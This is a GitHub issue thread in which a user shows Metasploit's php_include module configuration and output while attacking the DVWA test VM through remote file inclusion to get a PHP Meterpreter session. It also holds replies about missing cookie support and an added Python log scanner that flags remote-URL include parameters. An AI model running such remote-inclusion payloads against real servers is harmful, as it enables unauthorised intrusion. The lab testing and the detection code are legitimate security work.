question about PHP Meterpreter #809

Closed
anakin629 opened this Issue · 2 comments


@anakin629

I am using this module, http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter,
doing the test on DVWA (http://www.dvwa.co.uk/), a test VM which has an LFI test environment.
This is the basic config:


```
msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

   Name      Current Setting                                           Required  Description
   ----      ---------------                                           --------  -----------
   PATH      /                                                         yes       The base directory to prepend to the URL to try
   PHPRFIDB  /opt/metasploit/msf3/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /dvwa/vulnerabilities/fi/?page=XXpathXX                   no        The URI to request, with the include parameter changed to XXpathXX
   POSTDATA                                                            no        The POST data to send, with the include parameter changed to XXpathXX
   Proxies                                                             no        Use a proxy chain
   RHOST     192.168.245.130                                           yes       The target address
   RPORT     80                                                        yes       The target port
   SRVHOST   0.0.0.0                                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080                                                      yes       The local port to listen on.
   SSLCert                                                             no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                                             no        The URI to use for this exploit (default is random)
   VHOST                                                               no        HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  80               yes       The listen port
   RHOST  192.168.245.130  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(php_include) >
```

The result is:

```
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/TUit3E6Uxxs
[*] Sending stage (39217 bytes) to 192.168.245.130
[*] Local IP: http://192.168.245.128:8080/TUit3E6Uxxs
[*] PHP include server started.
[*] 192.168.245.130 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (127.0.0.1 -> 192.168.245.130:80) at 2012-09-20 09:58:24 +0800
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id

msf exploit(php_include) > sessions
```

I googled the error, and it said something about a heartbeat mechanism. I do not understand!
Can someone solve the problem?

@ethicalhack3r

Hi,

The php_include module did not support authenticated exploitation (the use of cookies) which DVWA requires.

I amended the script earlier this afternoon to support the passing of additional headers (cookies). See the following ticket for the code and usage information:

http://dev.metasploit.com/redmine/issues/7277

Thanks,
Ryan

@todb-r7
Owner

This is being tracked handily on Redmine at http://dev.metasploit.com/redmine/issues/7277 so closing this out -- we're trying to keep the GitHub issues strictly to Pull Requests, and keep bugs and questions and stuff over on Redmine (see https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md ).

@todb-r7 todb-r7 closed this
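
From the defender's side, the request shape in this thread (an include parameter such as `page=` carrying a remote URL like the `http://192.168.245.128:8080/...` one above) is straightforward to flag in web server logs. The following is an added example, not part of the original issue or of Metasploit's code; it assumes Apache-style access log lines, and the log lines and the names `fully_decode` and `find_remote_includes` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines for illustration only (not taken from the issue).
# Line 2 carries a remote URL in the include parameter; line 3 double-encodes it.
SAMPLE_LOG = """\
192.168.245.128 - - [20/Sep/2012:09:58:20 +0800] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 4312
192.168.245.128 - - [20/Sep/2012:09:58:23 +0800] "GET /dvwa/vulnerabilities/fi/?page=http://192.168.245.128:8080/TUit3E6Uxxs HTTP/1.1" 200 512
192.168.245.128 - - [20/Sep/2012:09:58:24 +0800] "GET /dvwa/vulnerabilities/fi/?page=http%253A%252F%252F192.168.245.128%253A8080%252FTUit3E6Uxxs HTTP/1.1" 200 512
192.168.245.128 - - [20/Sep/2012:09:58:30 +0800] "GET /dvwa/about.php?ref=https-faq HTTP/1.1" 200 1210
"""

# Client IP, request method, request target and status from a common/combined log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A parameter value that is itself an absolute remote URL.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_remote_includes(log_text):
    """Return (client_ip, parameter, decoded_value, status) for each suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)  # parse_qsl already decoded one layer
            if REMOTE_RE.match(value):
                hits.append((m["ip"], name, value, int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit)
```

Only GET query strings are inspected here; a POST body (the module's `POSTDATA` option) does not appear in a standard access log and would need request-body logging or a WAF to see.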